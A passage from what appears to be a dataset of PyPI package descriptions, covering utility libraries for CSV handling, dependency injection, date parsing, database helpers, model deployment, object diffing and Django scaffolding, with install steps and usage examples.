adding a badge.VisualsDepending on what you are making, it can be a good idea to include screenshots or even a video (you'll frequently see GIFs rather than actual videos). Tools like ttygif can help, but check out Asciinema for a more sophisticated method.InstallationWithin a particular ecosystem, there may be a common way of installing things, such as using Yarn, NuGet, or Homebrew. However, consider the possibility that whoever is reading your README is a novice and would like more guidance. Listing specific steps helps remove ambiguity and gets people to using your project as quickly as possible. If it only runs in a specific context like a particular programming language version or operating system or has dependencies that have to be installed manually, also add a Requirements subsection.UsageUse examples liberally, and show the expected output if you can. It's helpful to have inline the smallest example of usage that you can demonstrate, while providing links to more sophisticated examples if they are too long to reasonably include in the README.SupportTell people where they can go to for help. It can be any combination of an issue tracker, a chat room, an email address, etc.RoadmapIf you have ideas for releases in the future, it is a good idea to list them in the README.ContributingState if you are open to contributions and what your requirements are for accepting them.For people who want to make changes to your project, it's helpful to have some documentation on how to get started. Perhaps there is a script that they should run or some environment variables that they need to set. Make these steps explicit. These instructions could also be useful to your future self.You can also document commands to lint the code or run tests. These steps help to ensure high code quality and reduce the likelihood that the changes inadvertently break something. Having instructions for running tests is especially helpful if it requires external setup, such as starting a Selenium server for testing in a browser.Authors and acknowledgmentShow your appreciation to those who have contributed to the project.LicenseFor open source projects, say how it is licensed.Project statusIf you have run out of energy or time for your project, put a note at the top of the README saying that development has slowed down or stopped completely. Someone may choose to fork your project or volunteer to step in as a maintainer or owner, allowing your project to keep going. You can also make an explicit request for maintainers."} +{"package": "quick-csv", "pacakge-description": "Quick CSVRead and write small or large CSV/TXT files in a simple mannerInstallationpip install quick-csvExamples for small filesExample 1: read and write csv or txt filesfromquickcsv.fileimport*# read a csv filelist_model=read_csv('data/test.csv')foridx,modelinenumerate(list_model):print(model)list_model[idx]['id']=idx# save a csv filewrite_csv('data/test1.csv',list_model)# write a text filewrite_text('data/text1.txt',\"Hello World!\")# read a text fileprint(read_text('data/text1.txt'))Example 2: create dataframe from a list of modelsfromquickcsv.fileimport*# read a csv filelist_model=read_csv('data/test.csv')# create a dataframe from list_modeldf=create_df(list_model)# printprint(df)Examples for large filesExample 1: read large csv filefromquickcsv.largefileimport*if__name__==\"__main__\":csv_path=r\"umls_atui_rels.csv\"# a large file (>500 MB)total_count=0defprocess_partition(part_df,i):print(f\"Part{i}\")defprocess_row(row,i):globaltotal_countprint(i)total_count+=1list_results=read_large_csv(csv_file=csv_path,row_func=process_row,partition_func=process_partition)print(\"Return: \")print(list_results)print(\"Total Record Num: \",total_count)Example 2: query from a large csv filefromquickcsv.largefileimport*if__name__==\"__main__\":csv_path=r\"umls_sui_nodes.csv\"# a large file (>500 MB)total_count=0# process each partition in the large filedefprocess_partition(part_df,i):print(f\"Part{i}\")print()# process each row in a partition while readingdefprocess_row(row,i):globaltotal_countprint(row)total_count+=1# field is a field in the csv file, and value is the value you need to find within the csv filelist_results=read_large_csv(csv_file=csv_path,field=\"SUI\",value=\"S0000004\",append_row=True,row_func=process_row,partition_func=process_partition)print(\"Return: \")print(list_results)print(\"Total Record Num: \",total_count)Example 3: read top N records from the large csv filefromquickcsv.largefileimport*if__name__==\"__main__\":csv_path=r\"umls_atui_rels.csv\"total_count=0# return top 10 rows in the csv filelist_results=read_large_csv(csv_file=csv_path,head_num=10)print(\"Return: \")print(list_results)print(\"Total Record Num: \",total_count)LicenseThequick-csvproject is provided byDonghua Chen."} +{"package": "quickd", "pacakge-description": "quickdDecorator type-based dependency injection for Python\ud83d\udce6 InstallationThe packagequickdsupports Python >= 3.5. You can install it by doing:$pipinstallquickd\ud83d\udcdc ExampleHere is a quick example:fromquickdimportinject,factoryclassDatabase:passclassPostgreSQL(Database):def__str__(self):return'PostgreSQL'classMySQL(Database):def__str__(self):return'MySQL'@injectdefprint_database(database:Database):returnprint(database)@factorydefchoose_database()->Database:returnPostgreSQL()print_database()# Prints: PostgreSQLprint_database(MySQL())# Prints: MySQL\ud83d\ude80 UsageThere are only 3 decorators that compose the whole framework@factoryRegisters an instance for a specific type for later use with@injectIs mandatory to annotate the function with the return type of the class that you want to inject laterIt isnotdynamic, so the implementation can only be chosen oncefromquickdimportfactory@factorydefchoose_database()->Database:returnPostgreSQL()@injectInjects dependencies to a function by matching its arguments types with what has been registeredAs you can see below, it also works with constructorsfromquickdimportinject@injectdefprint_database(database:Database):returnprint(database)classUserService:@injectdef__init__(self,database:Database):pass@serviceRegisters a class to be later injectable without using@factoryIt also applies@injectto its constructorfromquickdimportservice,inject@serviceclassUserService:def__init__(self):self.users=['Bob','Tom']defall(self):returnself.usersdefadd(self,user):self.users.append(user)@injectdefget_users(service:UserService):returnservice.all()@injectdefadd_user(service:UserService):returnservice.add(\"Pol\")get_users()# ['Bob', 'Tom']add_user()get_users()# ['Bob', 'Tom', 'Pol']\ud83d\udc68\u200d\ud83c\udf73 RecipesHere are some common solutions to scenarios you will face.Interfacesfromabcimportabstractmethodfromquickdimportinject,factoryclassUserRepository:@abstractmethoddefsave(self,user):pass@abstractmethoddefsearch(self,id):passclassUserCreator:@injectdef__int__(self,repository:UserRepository):self.repository=repositorydefcreate(self,user):self.repository.save(user)classMySQLUserRepository(UserRepository):def__int__(self,host,password):self.sql=MySQLConnection(host,password)defsave(self,user):self.sql.execute('INSERT ...')defsearch(self,id):self.sql.execute('SELECT ...')@factorydefchoose_user_repository()->UserRepository:# Notice super class is being usedreturnMySQLUserRepository('user','123')TestingFollowing the above example we can create a unit test mocking the persistance, which will make our tests easier and\nfaster.fake_user={'id':1,'name':'Tom'}classFakeUserRepository(UserRepository):defsave(self,user):assertuser==fake_userrepository=FakeUserRepository()user_creator=UserCreator(repository)user_creator.create(fake_user)ConfigurationThere are multiple ways to configure your classes. A simple approach is to use environment variables on your factory\nannotated methods.importosfromquickdimportfactory@factorydefchoose_database()->Database:username=os.environ.get(\"POSTGRES_USER\")password=os.environ.get(\"POSTGRES_PASS\")returnPostgreSQL(username,password)\ud83e\udde0 MotivationDependency injection provides a great way to decouple your classes in order to improve testability and maintainability.Frameworks likeSpringorSymfonyare loved by the community.I will just add a parameter to the constructor and Spring will fill with a global instance of the classThese frameworks rely heavy on the type system, to know which class should go where.From Python 3.5 we have thetypingpackage. This addition allows us to\nhave the dependency injection framework that Python deserves."} +{"package": "quickD3map", "pacakge-description": "#quickD3map### D3 Point Maps from Pandas DataFramesquickD3map allows you to rapidly generate D3.js maps from data from withinthe pandas/ipython ecosystem by converting Latitude/Longitude Data in to points **Note: this is an experimental repo and not ready for use.**With that said, basic maps can be generated and below are a few examples of how they are made.#### To make the following interactive map:![Examplemap](https://dl.dropboxusercontent.com/u/1803062/quickD3map/map1.png)#### Install and Use from the Examples Directory```pythonimport pandas as pdfrom quickD3map import PointMap#load data and plotstations = pd.read_csv('data/weatherstations.csv')#make a PointMap objectpm = PointMap(stations, columns = ['LAT','LON','ELEV'])#display or write your map to filepm.display_map()pm.create_map(path=\"map.html\")````###Project GoalsThe goal of this project is rather limited in scope:- be able to rapidly plot location data from Pandas dataframes- be able to color by another column- be able to scale by another column- be able to plot connections between plotsI intend to include several map templates (geojson files) and will try tofigure out a template style that can provide the ability to include maps of many types.Just thinking aloud here but the best way to do this would be to standardize thegeojson input types for features so that loading of data (as JSOn strings) can be seperatedfrom everything else (transformation,scaling, etc.)###Thanks.To Mike Bostocks and the D3JS team, as well as to Rob Story and the Folium libary.#History0.1.4 (2014-03-21)++++++++++++++++++* PointClass and LineMap updated. MultiColumnMap rolled into PointMap0.1.2 (2014-03-21)++++++++++++++++++* Updated README with some rudimentary Documentation0.1.1 (2014-03-19)++++++++++++++++++* Fix Manifest file to include template directory0.1.0 (2014-03-19)++++++++++++++++++* First release on PyPI."} +{"package": "quickda", "pacakge-description": "Quick-EDASimple & Easy-to-use python modules to perform Quick Exploratory Data Analysis for any structured dataset!Getting StartedYou will need to havePython 3andJupyter Notebookinstalled in your local system. Once installed, clone this repository to your local to get the project structure setup.git clone https://github.com/sid-the-coder/QuickDA.gitYou will also need to install few python package dependencies in your evironment to get started. You can do this by:pip3 install -r requirements.txtOR you can also install the package fromPyPi Indexusing the pip installer:pip3 install quickdaTable of ContentsData Exploration - explore(data)data: pd.DataFramemethod: string, default=\"summarize\"\"summarize\" : Generates a summary statistics of the dataset\"profile\" : Generates a HTML Report of the Dataset Profilereport_name: string, default=\"Dataset Report\"Parameter to customise the generated report nameis_large_dataset: Boolean, default=FalseParameter set to True explicitly to flag, in case of a large datasetData Cleaning - clean(data): [Returns DataFrame]data: pd.DataFramemethod: string, default=\"default\"\"default\" : Standardizes column names, Removes duplicates rows and Drops missing values\"standardize\" : Standardizes column names\"dropcols\" : Drops columns specified by the user\"duplicates\" : Removes duplicate rows\"replaceval\" : Replaces a value in dataframe with new value specified by the user\"fillmissing\" : Interpolates all columns with missing values using forward filling\"dropmissing\" : Drops all rows with missing values\"cardinality\" : Reduces Cardinality of a column given a threshold\"dtypes\" : Explicitly converts the Data Types as specified by the user\"outliers\" : Removes all outliers in data using IQR methodcolumns: list/string, default=[]Parameter to specify column names in the DataFramedtype: string, default=\"numeric\"\"numeric\" : Converts columns dtype to numeric\"category\" : Converts columns dtype to category\"datetime\" : Converts columns dtype to datetimeto_replace: string/integer/regex, default=\"\"Parameter to pass a value to replace in the DataFranevalue: string/integer/regex, default=np.nanParameter to pass a new value that replaces an old value in the Dataframethreshold: float, default=0Parameter to set threshold in the range of [0,1] for cardinalityEDA Numerical Features - eda_num(data)data: pd.DataFramemethod: string, default=\"default\"\"default\" : Shows all Outlier & Distribution Analysis via BoxPlots & Histograms\"correlation\" : Gets the correlation matrix between all numerical featuresbins: integer, default=10Parameter to set the number of bins while displaying histogramsEDA Categorical Features - eda_cat(data, x)data: pd.DataFramex: string, First Categorical Type Column Namey: string, default=NoneParameter to pass the Second Categorical Type Column Namemethod: string, default=\"default\"\"default\" : Shows category count plot & summarizes it in a frequency tableEDA Numerical with Categorical Features - eda_numcat(data, x, y)data: pd.DataFramex: string/list, Numeric/Categorical Type Column Name(s)y: string/list, Numeric/Categorical Type Column Name(s)method: string, default=\"pps\"\"pps\" : Calculates Predictive Power Score Matrix\"relationship\" : Shows Scatterplot of given features\"comparison\" : Shows violin plots to compare categories across numerical features\"pivot\" : Generates pivot table using column names, values and aggregation functionhue: string, default=NoneParameter to visualise a categorical Type feature within scatterplotsvalues: string/list, default=NoneParameter to set columns to aggregate on pivot viewsaggfunc: string, default=\"mean\"Parameter to set aggregate functions on pivot tablesExample: 'min', 'max', 'mean', 'median', 'sum', 'count'EDA Time Series Data - eda_timeseries(data, x, y)data: pd.DataFramex: string, Datetime Type Column Namey: string, Numeric Type Column NameUpcoming WorkBasic Preprocessing for Text Data- Tokenization, Normalization, Noise Removal, LemmatizationEDA for Text Data- NGrams, POS tagging, Word Cloud, Sentiment AnalysisQuick Insight Generation for all EDA steps- Generate easy-to-read textual insights"} +{"package": "quick-dag", "pacakge-description": "No description available on PyPI."} +{"package": "quickdataanalysis", "pacakge-description": "quick data analysisThis packages allows you to kick start your data analysis and make faster insights of the data.RequirementsPandas >=1.0.1Documentation1) Creating Dummies for columnsThe create_dummies method will return dummies for the columns. For example you want to dummies for Gender column put the column name in a list and you will get the dataframe with the dummies.>>> df = create_dummies(df_train,[\"sex\"])\n >>> df\n male female\n 0 1\n 1 0\n 1 0\n 1 02) Counting the column valuesThe count_values method will return the number of values in the columns. For example you want to count the number of females.>>> column_value_count(df_train[\"female\"],1,False)\n 312ToDoAdd more methodAll contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome :)Happy Coding!!"} +{"package": "quickDatabase", "pacakge-description": "python-dbLight weight database for python, with a simple API and a simple file format.\nit is not meant to be a full featured database, but rather a simple way to store data in a file.\nit's written in python, and is compatible with python 3.6 and above.FeaturesSimple APIColorful outputEasy to useCLI interfaceOpen sourceDocumentationThe documentation is available atnot yet availableInstallationYou can install python-db using pip:pip install python-dbUsageTo use python-db, you need to import it:from python_db import Database"} +{"package": "quick-data-clean", "pacakge-description": "Data fast processing framework, only for python 3.6 and above.Specific information for technical documentation is not available for now"} +{"package": "quick-datasets", "pacakge-description": "datasets"} +{"package": "quickdate", "pacakge-description": "quickdate\u5feb\u6377\u5904\u7406\u65e5\u671f\u7684Python\u5e93\uff0c\u652f\u6301\u4ece\u5b57\u7b26\u4e32\u89e3\u6790\u65e5\u671f\uff0c\u7075\u6d3b\u5b9e\u73b0\u52a0\u51cf\u65e5\u3001\u5468\u3001\u6708\u3001\u5e74\u3001\u65f6\u3001\u5206\u3001\u79d2\u7684\u65f6\u95f4\u64cd\u4f5c\u5982\u4f55\u5b89\u88c5\uff1fpipinstallquickdate\u5982\u4f55\u4f7f\u7528qucickdate\u9ed8\u8ba4\u4ee5\u4eca\u5929\u7684\u8d77\u70b9\uff0c\u5f00\u59cb\u5b9a\u4f4d\u65e5\u671f\uff0c\u5f53\u7136\u4f60\u4e5f\u53ef\u4ee5\u4f7f\u7528DateLocate.parse\u65b9\u6cd5\uff0c\u4ece\u5b57\u7b26\u4e32\u89e3\u6790\u4e00\u4e2a\u65e5\u671f\uff0c\u5e76\u4ee5\u6b64\u4e3a\u8d77\u70b9\u652f\u6301\u7684\u4e3b\u8981\u51fd\u6570\u662fadd\u51fd\u6570\uff0c\u53ef\u4ee5\u52a8\u6001\u4f20\u5165 days\u3001weeks\u3001months\u3001years\u3001hours\u3001minutes\u3001seconds\u53c2\u6570\uff0c\u5e76\u8fd4\u56de\u4e3a DateLocate\u5bf9\u8c61\u672c\u8eab\u8fd9\u610f\u5473\u7740\uff0c\u53ef\u4ee5\u94fe\u5f0f\u5b9a\u4f4d\u65e5\u671f\uff0c\u66f4\u4e3a\u65b9\u4fbf\u5feb\u6377>>>fromquickdate.quickdateimportDateLocate>>>DateLocate().format(\"%Y-%m-%d\")2023-08-21>>>fromquickdate.quickdateimportDateLocate>>>DateLocate.parse('20230821').format(\"%Y-%m-%d\")2023-08-21\u5176\u4e2d\uff0c parse \u51fd\u6570\u8fd8\u652f\u6301\u4ee5\u4e0b\u65e5\u671f\u65f6\u95f4\u683c\u5f0f\uff08\u4e0d\u9650\u4e8e\uff09>>>DateLocate.parse('22nd,July,2009').format(\"%Y-%m-%d\")2009-07-22>>>DateLocate.parse('2018-04-20').format(\"%Y-%m-%d\")2018-04-20>>>DateLocate.parse('2018').format(\"%Y-%m-%d\")2018-08-21>>>DateLocate.parse('5,').format(\"%Y-%m-%d\")2023-08-05>>>DateLocate.parse('9:10:8').format(\"%Y-%m-%d%H:%M:%S\")2023-08-2109:10:08>>>DateLocate.parse('02/11/2016').format(\"%Y-%m-%d%H:%M:%S\")2016-02-1100:00:00\u4ee5\u4e0b\uff0c\u5c06\u4ee5\u4eca\u5929\u4e3a\u8d77\u70b9\uff0c\u8bf4\u660e quickdate \u5e93\u7684\u7528\u6cd5# \u6309\u65e5\u5b9a\u4f4d\u65e5\u671f>>>DateLocate().format(\"%Y-%m-%d\")2023-08-21>>>DateLocate().add(days=-1).format(\"%Y-%m-%d\")2023-08-20# \u6309\u5468\u5b9a\u4f4d\u65e5\u671f>>>DateLocate().add(weeks=-1).format(\"%Y-%m-%d\")2023-08-14# \u6309\u6708\u5b9a\u4f4d\u65e5\u671f>>>DateLocate().add(months=-1).format(\"%Y-%m-%d\")2023-07-21# \u7279\u522b\u5730\uff0c\u82e5\u5f53\u5929\u4e3a\u672c\u6708\u6700\u540e\u4e00\u5929\uff0c\u83b7\u53d6\u4e0a\u6708\u65e5\u671f\u65f6\uff0c\u4f1a\u8f83\u6b63\u4e3a\u51c6\u786e\u4e0a\u6708\u6700\u540e\u4e00\u5929\u7684\u65e5\u671f>>>DateLocate.parse(\"2023-03-31\").add(months=-1).format(\"%Y-%m-%d\")2023-02-28# \u6309\u5e74\u5b9a\u4f4d\u65e5\u671f>>>DateLocate().add(years=-1).format(\"%Y-%m-%d\")2022-08-21\u5b9a\u4f4d\u65e5\u671f\u7684\u65b9\u5f0f\uff0c\u9664\u4e86\u4ee5\u4e0a\u4f20\u4e00\u4e2a\u53c2\u6570\u4ee5\u5916\uff0c\u8fd8\u53ef\u4ee5\u590d\u5408\u4f20\u591a\u4e2a\u53c2\u6570\uff08\u4f46\u540c\u4e00\u4e2a\u53c2\u6570\u4ec5\u80fd\u4f20\u4e00\u6b21\uff09>>>DateLocate().add(weeks=-1,days=2,months=-2,years=-1).format(\"%Y-%m-%d\")2022-06-16\u8fd8\u53ef\u4ee5\u8fdb\u884c\u94fe\u5f0f\u5b9a\u4f4d>>>DateLocate().add(days=-1).add(weeks=-3).lastDay().format(\"%Y-%m-%d\")2023-07-31\u53ef\u6839\u636e\u9700\u6c42\uff0c\u76f4\u63a5\u8bbe\u5b9a\u5e74\u6708\u65e5\u65f6\u5206\u79d2\u7684\u503c>>>DateLocate().year(2022).month(12).day(5).hour(10).format(\"%Y-%m-%d%H:%M:%S\")2022-12-0510:41:47\u901a\u8fc7 week \u51fd\u6570\uff0c\u53ef\u83b7\u53d6\u5b9a\u4f4d\u65e5\u671f\u540c\u5468\u7684\u5468\u4e00\u81f3\u5468\u65e5\u7684\u65e5\u671f>>>DateLocate().week(5).format(\"%Y-%m-%d\")2023-08-25\u901a\u8fc7 lastDay \u51fd\u6570\uff0c\u53ef\u83b7\u53d6\u5b9a\u4f4d\u65e5\u671f\u5f53\u6708\u6700\u540e\u4e00\u5929\u7684\u65e5\u671f>>>DateLocate().lastDay().format(\"%Y-%m-%d\")2023-08-31\u4f7f\u7528\u6848\u4f8b\u83b7\u53d6\u5f53\u5929\u65e5\u671f>>>fromquickdate.quickdateimportDateLocate>>>DateLocate().format(\"%Y-%m-%d\")2023-08-21\u83b7\u5230\u6628\u5929\u65e5\u671f>>>DateLocate().add(days=-1).format(\"%Y-%m-%d\")2023-08-20\u83b7\u53d6\u4e0a\u5468\u4e09\u7684\u65e5\u671f>>>DateLocate().add(weeks=-1).week(3).format(\"%Y-%m-%d\")2023-08-16\u83b7\u53d6\u53bb\u5e74\u4eca\u65e5\u5bf9\u5e94\u6708\u4efd\u7684\u6700\u540e\u4e00\u5929>>>DateLocate().add(years=-1).lastDay().format(\"%Y-%m-%d\")2022-08-31\u83b7\u53d6\u4e0a\u4e2a\u6708\u76841\u53f7>>>DateLocate().add(months=-1).day(1).format(\"%Y-%m-%d\")2023-07-01\u83b7\u53d6\u4e0a\u4e0a\u5468\u516d\u7684\u65e5\u671f>>>DateLocate().add(weeks=-2).week(6).format(\"%Y-%m-%d\")2023-08-12"} +{"package": "quickdb", "pacakge-description": "\u4e00\u3001\u6a21\u5757\u4ecb\u7ecdquickdb \u662f\u4e00\u4e2a\u64cd\u4f5c\u5408\u96c6mysqlpostgresqlkafkamongoredis\u4e8c mysql\u4f7f\u7528 sqlalchemy \u4e3a\u5176\u5b9a\u4e49\u4e86\u4e00\u4e2a\u7c7bMysqlSQLAlchemyEngine2.1\u3001MysqlSQLAlchemyEngine\u8be5\u7c7b\u7ee7\u627f\u81ea SQLAlchemyEngineBase \u7528\u6765\u5b9a\u4e49\u8fde\u63a5\u53ef\u63a5\u6536 sqlalchemy create_engine \u7684\u53c2\u6570engine = MysqlSQLAlchemyEngine(host='localhost', port=3306, user='root', pwd='1234', db='test')\n\nwith engine.session() as session, session.begin:\n pass\n\nwith engine.connection() as conn, conn.begin:\n pass2.2\u3001MysqlSQLAlchemyEngine \u65b9\u6cd5\u5176\u542b\u6709\u4ee5\u4e0b\u65b9\u6cd5\uff1areverse_table_model\uff1a\u9006\u5411\u8868\u6a21\u578binsert\uff1a\u4e00\u6761\u6216\u591a\u6761upsert\uff1a\u4e00\u6761\u6216\u591a\u6761deleteexecutemerge\u4e3b\u8981\u8bf4\u4e00\u4e0b reverse_table_model\n\u8be5\u65b9\u6cd5\u542b\u6709\u4e09\u4e2a\u53c2\u6570\uff1apath\uff1a\u751f\u6210\u7684 model \u8def\u5f84\uff0c\u9700\u542b\u6587\u4ef6\u540dtables\uff1a\u9700\u8981\u7684\u8868\uff0c\u53ef\u4e0d\u6307\u5b9acommands\uff1a\u989d\u5916\u7684\u547d\u4ee4method = MysqlSQLAlchemyMethods(engine=engine)\nmethod.reverse_table_model(path='./modules.py')\u4e09\u3001postgresql\u540c mysql\u56db\u3001kafka\u4e3b\u8981\u662f\u4f7f\u7528\u4e86 with \u548c\u65b9\u4fbf\u7684 send\uff0c\u4f1a\u5e2e\u52a9\u4f60\u5c06 msg \u8f6c\u5316\u4e3a bytes\uff0c\u4e5f\u53ef\u4ee5\u540c\u65f6 flushp = KafkaMsgProducer(server=xxx)\np.send(topic, msg)\n\nwith KafkaMsgProducer(server=xxx) as p:\n p.send()\u4e94\u3001mongo\u901a\u8fc7 get_collection \u8fd4\u56de\u7684\u662f\u4fee\u6539\u8fc7\u7684 Collection \u5bf9\u8c61\uff0c\u5176\u6709\u4e24\u4e2a\u65b0\u65b9\u6cd5iter: \u5feb\u901f\u8fed\u4ee3\u6570\u636e\u5e93upsert_one\uff1a\u63d2\u5165\u6216\u66f4\u65b0\u7684\u4fbf\u6377\u5199\u6cd5conn = MongoConn(host, port)\ncol = conn.get_collection(db, col)\n\nfor i in col.iter():\n print(i)\u5176\u4f7f\u7528\u4e86 with\uff0c\u53ef\u4ee5\u81ea\u52a8\u56de\u6536\u8fde\u63a5conn = MongoConn(host, port)\ncol = conn.get_collection(db, col)\nconn.close()\n\nwith MongoConn(host, port) as conn:\n col = conn.get_collection(db, col)\u516d\u3001redis1\u3001redisConnwith RedisConn() as conn:\n pass2\u3001RedisLock\u8fd9\u662f\u4e00\u4e2a\u963b\u585e\u7684 redis \u4e8b\u52a1\u9501with RedisLock(lock_name=\"\"):\n pass3\u3001RedisLockNoWait\u8fd9\u662f\u4e00\u4e2a\u975e\u963b\u585e\u7684 redis \u4e8b\u52a1\u9501\uff0c\u53ea\u6709\u83b7\u53d6\u5230\u9501\u7684\u4eba\u624d\u6267\u884c\uff0c\u83b7\u53d6\u4e0d\u5230\u5c31\u4e0d\u4f1a\u7ee7\u7eed\u7b49\u5f85\u9501\uff0c\u4f46\u662f\u9700\u8981\u4f7f\u7528 lock_success \u5224\u65adwith RedisLockNoWait(lock_name=\") as lock:\n if lock.lock_success:\n ..."} +{"package": "quickdebrepo", "pacakge-description": "UNKNOWN"} +{"package": "quick-debug", "pacakge-description": "UNKNOWN"} +{"package": "quickdemo", "pacakge-description": "quickdemoFor when unit tests would be too much!quickdemois a tiny Python library for code demonstrations and small-scale testing.\nIf your debugging tool of choice is printing tostdout, this might be the right library for you.quickdemoallows you to decorate any module-level function with aninvocationortestingdirective:import quickdemo as qd\n\n@qd.expect([1, 2], [0, 1], 1)\n@qd.run([1, 2, 3], 5)\ndef add_to_list(input_list, number):\n return [x + number for x in input_list]The snippet above produces the following output:add_to_list([1, 2, 3], 5) -> [6, 7, 8]\nPassed: add_to_list([0, 1], 1)Check out theshowcase*.pyfiles for more examples!I developedquickdemofor two reasons:Firstly, when presenting solutions to other people, I always wrote severalprintstatements per function to demonstrate the correctness of the solution.\nTheprintstatements always added up quickly, making it difficult to discern which output corresponded to which function.\nAlso, changing any function name implied re-writing the invocation code.\nThis was especially tedious when working with Jupyter Notebooks, where you have to take great care to re-run a cell each time something changes.Secondly, there is an educational programming language calledPyret, which allows writing short unit tests as part of a function definition.\nI believe this to be a sensible choice when targeting beginners.\nUnfortunately, Pyret code is neither readable nor particularly fast, so I decided to introduce this feature to Python as a part ofquickdemo."} +{"package": "quick-deploy", "pacakge-description": "Quick-DeployOptimize and deploy machine learning models fast and easy as possible.quick-deploy provide tools to optimize, convert and deploy machine learning models as fast inference API (low latency and high throughput) byTriton Inference ServerusingOnnx Runtimebackend. It support \ud83e\udd17 transformers, PyToch, Tensorflow, SKLearn and XGBoost models.Get StartedLet's see an quick example by deploying bert transformers for GPU inference. quick-deploy already have support \ud83e\udd17 transformers so we can specify the path of pretrained model or just the name from the Hub:$quick-deploytransformers\\-nmy-bert-base\\-ptext-classification\\-mbert-base-uncased\\-o./models\\--model-typebert\\--seq-len128\\--cudaThe command above created the deployment artifacts by optimizing and converting the model to Onxx. Next just run the inference server:$dockerrun-it--rm\\--gpusall\\--shm-size256m\\-p8000:8000\\-p8001:8001\\-p8002:8002\\-v$(pwd)/models:/modelsnvcr.io/nvidia/tritonserver:21.11-py3\\tritonserver--model-repository=/modelsNow we can use tritonclient which uses gRPC calls to consume our model:importnumpyasnpimporttritonclient.httpfromscipy.specialimportsoftmaxfromtransformersimportBertTokenizer,TensorTypetokenizer=BertTokenizer.from_pretrained('bert-base-uncased')model_name=\"my_bert_base\"url=\"127.0.0.1:8000\"model_version=\"1\"batch_size=1text=\"The goal of life is [MASK].\"tokens=tokenizer(text=text,return_tensors=TensorType.NUMPY)triton_client=tritonclient.http.InferenceServerClient(url=url,verbose=False)asserttriton_client.is_model_ready(model_name=model_name,model_version=model_version),f\"model{model_name}not yet ready\"input_ids=tritonclient.http.InferInput(name=\"input_ids\",shape=(batch_size,9),datatype=\"INT64\")token_type_ids=tritonclient.http.InferInput(name=\"token_type_ids\",shape=(batch_size,9),datatype=\"INT64\")attention=tritonclient.http.InferInput(name=\"attention_mask\",shape=(batch_size,9),datatype=\"INT64\")model_output=tritonclient.http.InferRequestedOutput(name=\"output\",binary_data=False)input_ids.set_data_from_numpy(tokens['input_ids']*batch_size)token_type_ids.set_data_from_numpy(tokens['token_type_ids']*batch_size)attention.set_data_from_numpy(tokens['attention_mask']*batch_size)response=triton_client.infer(model_name=model_name,model_version=model_version,inputs=[input_ids,token_type_ids,attention],outputs=[model_output],)token_logits=response.as_numpy(\"output\")print(token_logits)Note:This does only model deployment the tokenizer and post-processing should be done in the client side. The full tansformers deployment is comming soon.For more use cases please check theexamplespage.InstallBefore install make sure to install just the target model eg.: \"torch\", \"sklearn\" or \"all\". There two options to use quick-deploy, by docker container:$dockerrun--rm-itrodrigobaron/quick-deploy:0.1.1-all--helpor install the python libraryquick-deploy:$pipinstallquick-deploy[all]Note:This will install the full vesionall.ContributingPlease follow theContributingguide.LicenseApache License 2.0"} +{"package": "quickder.arpa2", "pacakge-description": "Quick DER precompiled ASN.1 codeMany standards specifications define ASN.1 fragments.\nWe try to deliver them to you in shrink-wrapped form.Ideally, in Python all you would do to use ASN.1 from a\ngiven standard would be something likefrom quickder.rfc import rfc4511Similarly, in C all you would do to use the same standard\nwould be#include The Quick DER package offers just that. It comes with\npackages likequickder.rfcfor Python andquickder-rfcfor C. In both cases a namespace for specifications\nsurrounds the information. Multiple packages can add\ntheir pre-compiled things here.Have a look in therfc directoryfor an idea\nof how this is done."} +{"package": "quickder.itu", "pacakge-description": "Quick DER precompiled ASN.1 codeMany standards specifications define ASN.1 fragments.\nWe try to deliver them to you in shrink-wrapped form.Ideally, in Python all you would do to use ASN.1 from a\ngiven standard would be something likefrom quickder.rfc import rfc4511Similarly, in C all you would do to use the same standard\nwould be#include The Quick DER package offers just that. It comes with\npackages likequickder.rfcfor Python andquickder-rfcfor C. In both cases a namespace for specifications\nsurrounds the information. Multiple packages can add\ntheir pre-compiled things here.Have a look in therfc directoryfor an idea\nof how this is done."} +{"package": "quickder.rfc", "pacakge-description": "Quick DER precompiled ASN.1 codeMany standards specifications define ASN.1 fragments.\nWe try to deliver them to you in shrink-wrapped form.Ideally, in Python all you would do to use ASN.1 from a\ngiven standard would be something likefrom quickder.rfc import rfc4511Similarly, in C all you would do to use the same standard\nwould be#include The Quick DER package offers just that. It comes with\npackages likequickder.rfcfor Python andquickder-rfcfor C. In both cases a namespace for specifications\nsurrounds the information. Multiple packages can add\ntheir pre-compiled things here.Have a look in therfc directoryfor an idea\nof how this is done."} +{"package": "quickdev", "pacakge-description": "Example PackageThis is a highky opinionated framework for developing applications.I have been using bits and pieces of this for over two decades. This\nis a very early release of code that I am origanizing and documenting\nfor use by others."} +{"package": "quickdiagrams", "pacakge-description": "UNKNOWN"} +{"package": "quickdiary", "pacakge-description": "No description available on PyPI."} +{"package": "quickdiff", "pacakge-description": "quickdiffquickdiffis a python library for quickly finding nested differences between two python objects.Usage:fromquickdiffimport*a={1:1,2:2,3:[3],4:4}b={1:1,2:4,3:[3,4],5:5,6:6}report=quickdiff(a,b)assertreport==DiffReport(val_changes=[ValChange(path=[2],a=2,b=4)],type_and_val_changes=[],dict_items_added=[DictDiff(path=[],key=5,val=5),DictDiff(path=[],key=6,val=6)],dict_items_removed=[DictDiff(path=[],key=4,val=4)],iter_len_mismatch=[IterLenMismatch(path=[3],a_len=1,b_len=2)])Diff objects (ValChange,DictDiff, etc) are NamedTuples for improved ergonomics and thus can be unpacked as you would any tuple:forpath,a,binreport.val_changes:print(path,a,b)# ([2], 2, 4)Why not DeepDiffI wrote this becauseDeepDiffis quite slow as it's written in pure Python and has a lot of features.Quickdiff on the other hand is simple and written in Rust. The current implementation yields a 16x performance boost on my personal benchmarks.DevelopmentUsematurinfor development:pipinstallmaturinCompile development version with:maturindevelopmentRun tests:python-munittestdiscovertestsRoadmapsupport for sets (currently is treated as an iterator)parallelize for improved performance (by usingpyo3-ffito sidestep the Python runtime)attribute diff checking for python objectssupport custom__eq__()implementations"} +{"package": "quick-django", "pacakge-description": "quick-djangoCreate django project quickly single command with all necessary file like djnago app, urls.py, templates folder, static folder and add the default code in view.py,models.py,admin.py and create index.htmlHow to use quick-djangoStep: 1pipinstallquick-djangoStep: 2Windowopen cmd in your porject folder and run this commandpython-mquick-djangomyprojectmyproject_appLinuxopen terminal in your porject folder and run this commandpython3-mquick-djangomyprojectmyproject_appConfiguration# setting.pyINSTALLED_APPS=[....'myproject_app',]For Rest-ApiWindowopen cmd in your porject folder and run this commandpython-mquick-djangomyprojectmyproject_app--restapiLinuxopen terminal in your porject folder and run this commandpython3-mquick-djangomyprojectmyproject_app--restapiConfiguration# 